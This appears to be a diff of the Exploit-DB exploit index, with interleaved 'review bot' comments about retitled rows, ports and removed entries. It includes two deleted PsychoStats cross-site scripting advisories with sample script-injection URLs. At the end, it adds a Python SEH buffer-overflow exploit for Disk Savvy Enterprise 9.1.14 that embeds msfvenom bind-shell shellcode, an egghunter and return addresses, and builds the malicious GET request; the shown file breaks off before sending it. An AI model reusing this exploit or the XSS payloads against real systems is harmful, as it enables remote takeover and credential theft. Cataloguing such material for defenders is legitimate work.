14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
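Review bot: the row for 40854, "Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow", is the one record this hunk adds (the hunk grows from 12 to 13 lines), and it lands with port 0. The October entries for the same product family in the previous hunk (40452 and 40455 to 40459) record port 80, so if this PoC also targets the product's HTTP service the port column should be 80; the same question applies to rows 40830 to 40835, which are retitled here but keep port 0. Row 40833 also precedes 40832, so the id order could be fixed in the same edit.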
@ -15730,7 +15731,7 @@ id,file,description,date,author,platform,type,port
242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi - Remote Command Execution",2001-01-12,"Marco van Berkum",cgi,webapps,0
289,platforms/cgi/webapps/289.pl,"sendtemp.pl - Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0
309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps,0
384,platforms/php/webapps/384.txt,"PHP - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0
384,platforms/php/webapps/384.txt,"PHP 4.3.7 - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0
406,platforms/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",php,webapps,0
407,platforms/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0
430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps,0
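Review bot: row 384 gains a version ("PHP 4.3.7") but keeps the old parenthesised style, "(php-exec-dir) Patch Command Access Restriction Bypass", while other rows in this patch convert parenthesised names to single-quoted ones (for example "(rename)" to "'rename' Command" on row 8295). Quote 'php-exec-dir' here too, or leave the title untouched until the style pass reaches it, so that a row is not left half-converted.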
@ -16360,7 +16361,7 @@ id,file,description,date,author,platform,type,port
2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0
2143,platforms/php/webapps/2143.pl,"TWiki 4.0.4 - (configure) Remote Command Execution",2006-08-07,"Javier Olascoaga",php,webapps,0
2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - (INIT_PATH) Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps,0
2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,80
2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - 'article-raw.php' Remote File Inclusion",2006-08-08,Drago84,php,webapps,80
2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - (REP_INC) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0
2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - 'Language' Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80
@ -16615,7 +16616,7 @@ id,file,description,date,author,platform,type,port
2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - (includes/functions.php) Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0
2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0
2470,platforms/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps,0
2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - (FrontPage.php) Remote File Inclusion",2006-10-03,Kacper,php,webapps,0
2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0
2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - (show_hlp.php) File Inclusion",2006-10-03,Kacper,php,webapps,0
2473,platforms/php/webapps/2473.c,"Invision Gallery 2.0.7 - readfile() & SQL Injection",2006-10-03,1nf3ct0r,php,webapps,0
2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0
@ -17098,7 +17099,7 @@ id,file,description,date,author,platform,type,port
3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2)",2007-01-17,trew,php,webapps,0
3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - (mep/frame.php) Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0
3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (3)",2007-01-17,666,php,webapps,0
3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (FrontPage.php) Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0
3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0
3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0
3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0
3153,platforms/php/webapps/3153.php,"phpBP RC3 (2.204) - SQL Injection / Remote Code Execution",2007-01-18,Kacper,php,webapps,0
@ -17275,7 +17276,7 @@ id,file,description,date,author,platform,type,port
3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0
3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0
3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0
3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0
3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' Parameter SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0
3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0
3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0
3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0
@ -18777,28 +18778,28 @@ id,file,description,date,author,platform,type,port
5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0
5680,platforms/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,php,webapps,0
5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injections",2008-05-28,cOndemned,php,webapps,0
5684,platforms/php/webapps/5684.txt,"Joomla! Component Artist (idgalery) - SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0
5685,platforms/php/webapps/5685.txt,"FlashBlog - (articulo_id) SQL Injection",2008-05-28,HER0,php,webapps,0
5684,platforms/php/webapps/5684.txt,"Joomla! Component Artist - 'idgalery' Parameter SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0
5685,platforms/php/webapps/5685.txt,"FlashBlog - 'articulo_id' Parameter SQL Injection",2008-05-28,HER0,php,webapps,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0
5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' SQL Injection",2008-05-29,QTRinux,php,webapps,0
5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' Parameter SQL Injection",2008-05-29,QTRinux,php,webapps,0
5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion",2008-05-29,gmda,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,EgiX,php,webapps,0
5692,platforms/php/webapps/5692.pl,"Mambo Component mambads 1.0 RC1 Beta - SQL Injection",2008-05-29,Houssamix,php,webapps,0
5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0
5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - 'image.php' Directory Traversal",2008-05-29,Stack,php,webapps,0
5696,platforms/php/webapps/5696.pl,"phpBookingCalendar 10 d - SQL Injection",2008-05-29,Stack,php,webapps,0
5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0
5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' SQL Injection",2008-05-30,K-159,php,webapps,0
5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' Parameter SQL Injection",2008-05-30,K-159,php,webapps,0
5699,platforms/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injections",2008-05-31,Mr.SQL,php,webapps,0
5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload",2008-05-31,irk4z,php,webapps,0
5701,platforms/php/webapps/5701.txt,"Social Site Generator - (sgc_id) SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0
5701,platforms/php/webapps/5701.txt,"Social Site Generator 2.0 - 'sgc_id' Parameter SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0
5702,platforms/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0
5703,platforms/php/webapps/5703.txt,"PHP Visit Counter 0.4 - (datespan) SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5704,platforms/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - (site_id) Local File Inclusion",2008-05-31,mozi,php,webapps,0
5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 - 'id' Blind SQL Injection",2008-05-31,JosS,asp,webapps,0
5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
5708,platforms/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
5710,platforms/php/webapps/5710.pl,"Joomla! Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
5703,platforms/php/webapps/5703.txt,"PHP Visit Counter 0.4 - 'datespan' Parameter SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5704,platforms/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - 'site_id' Parameter Local File Inclusion",2008-05-31,mozi,php,webapps,0
5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 - 'id' Parameter Blind SQL Injection",2008-05-31,JosS,asp,webapps,0
5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'mid' Parameter SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5707,platforms/php/webapps/5707.txt,"Social Site Generator 2.0 - 'path' Parameter Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
5708,platforms/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' Parameter SQL Injection",2008-05-31,His0k4,php,webapps,0
5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection",2008-05-31,Stack,php,webapps,0
5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
5714,platforms/php/webapps/5714.pl,"Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
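Review bot: component naming is converted inconsistently in this hunk. Row 5710 changes "com_biblestudy 1.5.0" to "Bible Study 1.5.0", but row 5714 two lines below keeps "Joomla! Component com_mycontent 1.1.13" and row 5708 keeps the raw "prayercenter". Dropping the com_ identifier also removes the string a defender would search for when matching an installed extension against this list, so either keep the identifier alongside the display name or apply one rule to all three rows. Row 5706 likewise loses "index.php" when it becomes "'mid' Parameter"; confirm that the file name is not needed to locate the vulnerable endpoint.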
@ -18987,7 +18988,7 @@ id,file,description,date,author,platform,type,port
5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection",2008-06-24,K-159,php,webapps,0
5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injections",2008-06-24,"CWH Underground",php,webapps,0
5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - (detail.asp iEve) SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0
5928,platforms/php/webapps/5928.txt,"HiveMaker Directory - 'index.php cid' SQL Injection",2008-06-24,"security fears team",php,webapps,0
5928,platforms/php/webapps/5928.txt,"HiveMaker Directory - 'cid' Parameter SQL Injection",2008-06-24,"security fears team",php,webapps,0
5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - (adclick.php bannerid) SQL Injection",2008-06-24,"Hussin X",php,webapps,0
5930,platforms/php/webapps/5930.txt,"Link ADS 1 - 'out.php linkid' SQL Injection",2008-06-24,"Hussin X",php,webapps,0
5931,platforms/php/webapps/5931.pl,"TOKOKITA - 'barang.php produk_id' SQL Injection",2008-06-24,k1tk4t,php,webapps,0
@ -20331,7 +20332,7 @@ id,file,description,date,author,platform,type,port
7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0
7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0
7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - (FrontPage.php) Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0
7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
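Review bot: the retitle of row 7683 only swaps (FrontPage.php) for 'FrontPage.php', while rows 7679 and 7682 in the same hunk keep their parenthesised qualifiers, (forumid) and (Authentication Bypass). Either normalise the neighbouring rows in this commit or say in the commit message that titles are being converted one at a time, so that the mixed styles are not read as meaningful.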
@ -27097,7 +27098,7 @@ id,file,description,date,author,platform,type,port
24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - (gmembers.php gid Parameter) Blind SQL Injection",2013-03-25,Esac,php,webapps,0
24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0
24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0
24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - (awards.php id Parameter) Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0
24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0
24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0
24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid Parameter' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0
24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0
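Review bot: the retitle of row 24893 loses information. (awards.php id Parameter) becomes 'awards.php', which drops the affected parameter name, while row 24881 at the top of the hunk still names both file and parameter (gmembers.php gid Parameter). Suggest "PsychoStats 3.2.2b - 'awards.php' 'id' Parameter Blind SQL Injection" or a similar form that keeps the parameter.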
@ -27161,7 +27162,6 @@ id,file,description,date,author,platform,type,port
25043,platforms/php/webapps/25043.txt,"phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0
25044,platforms/php/webapps/25044.txt,"phpGroupWare 0.9.x - 'index.php' HTML Injection",2004-01-27,"Cedric Cochin",php,webapps,0
25045,platforms/php/webapps/25045.txt,"2BGal 2.5.1 - SQL Injection",2004-12-22,zib,php,webapps,0
25048,platforms/php/webapps/25048.txt,"PsychoStats 2.x - Login Parameter Cross-Site Scripting",2004-12-22,"James Bercegay",php,webapps,0
25051,platforms/cgi/webapps/25051.txt,"Wirtualna Polska WPKontakt 3.0.1 - Remote Script Execution",2004-12-23,"Poznan Supercomputing",cgi,webapps,0
25052,platforms/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",php,webapps,0
25053,platforms/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,php,webapps,0
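Review bot: this hunk shrinks from 7 lines to 6 with no stated reason for the removal. The advisory deleted later on this page describes the PsychoStats 'login' parameter cross-site scripting issue, which matches row 25048, so that is presumably the row being dropped. If it duplicates another entry, the commit message should name the surviving id, because anything that refers to 25048 by number or by platforms/php/webapps/25048.txt will stop resolving.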
@ -30455,7 +30455,7 @@ id,file,description,date,author,platform,type,port
30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0
30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0
30050,platforms/php/webapps/30050.html,"Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0
30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Full Path Disclosure",2007-05-17,kefka,php,webapps,0
30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps,0
30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0
30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0
30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0
@ -30854,7 +30854,6 @@ id,file,description,date,author,platform,type,port
30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 - Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",php,webapps,0
30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",php,webapps,0
30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - Parser_Path Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps,0
30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0
30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 - ShowOwn.php Cross-Site Scripting",2007-05-22,CorryL,php,webapps,0
30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0
30076,platforms/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0
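Review bot: a second PsychoStats cross-site scripting row is removed here (7 lines to 6, matching row 30072 and the deleted bid/24106 advisory), and the PsychoStats rows that remain visible in this diff, 24893 and 30051, cover SQL injection and path disclosure only. Unless another entry outside these hunks carries the XSS advisories, this removes that coverage from the index; please record in the commit message which entry supersedes 30072.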
@ -35708,7 +35707,7 @@ id,file,description,date,author,platform,type,port
38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module - Unspecified Customer Field Cross-Site Scripting",2012-12-10,tommccredie,php,webapps,0
38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0
38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",php,webapps,0
38127,platforms/php/webapps/38127.php,"PHP - cgimode fpm writeprocmemfile Bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
38127,platforms/php/webapps/38127.php,"PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function",2015-09-10,ylbhz,php,webapps,0
38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0
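Review bot: the retitle of row 38127 adds a version, PHP 5.5.9, that nothing in this diff substantiates, since 38127.php itself is not touched here. If 5.5.9 is the version the author tested rather than the only affected one, say so in the commit message, because a version in the title tends to be read as the affected range. Dropping the trailing "demo" is fine.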
@ -36294,7 +36293,7 @@ id,file,description,date,author,platform,type,port
39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0
39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0
39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39273,platforms/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,php,webapps,0
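Review bot: the retitle of row 39273 removes the path /2author/index.php at the same time as it adds version 4.4.4. The version brings the row in line with 39272, but 39271 in the same hunk is left unversioned, and without the path the title no longer identifies the endpoint that takes 'color'. Suggest keeping both, for example "CMSimple 4.4.4 - '/2author/index.php' 'color' Parameter Remote Code Execution".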


@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/12089/info
PsychoStats is reported prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
The problem presents itself when malicious HTML and script code is sent to the application through the 'login' parameter.
This vulnerability may allow for theft of cookie-based authentication credentials or other attacks.
This vulnerability is reported to exist in PsychoStats 2.2.4 Beta and prior versions.
http://www.example.com/stats/login.php?login=%22%3E%3Ciframe%3E


@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/24106/info
PsychoStats is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PsychoStats 3.0.6b is vulnerable; other versions may also be affected.
http://www.example.com/psychostats/weapons.php/>"><script>alert(1)</script>


@ -0,0 +1,76 @@
#!/usr/bin/python
import socket,os,time
#SEH Stack Overflow in GET request
#Disk Savvy Enterprise 9.1.14
#Tested on Windows XP SP3 && Windows 7 Professional
host = "192.168.1.20"
port = 80
#badchars \x00\x09\x0a\x0d\x20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a"+
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77"+
"\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"+
"\xff\xe7")
seh = "\xc0\x42\x11\x10" #pop pop ret [libspp.dll]
nseh = "\xeb\x06\x90\x90" #jmp short +0x8
egg = "w00tw00t"
offset = 551
buffer_size = 5000
crash = "\x41"*10 + egg + "\x90"*2
crash += buf + "\x90"*(offset-20-len(buf))
crash += nseh + seh + "\x90"*8
crash += egghunter + "\x44"*(buffer_size-offset-16-len(egghunter))
request = "GET /" + crash + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
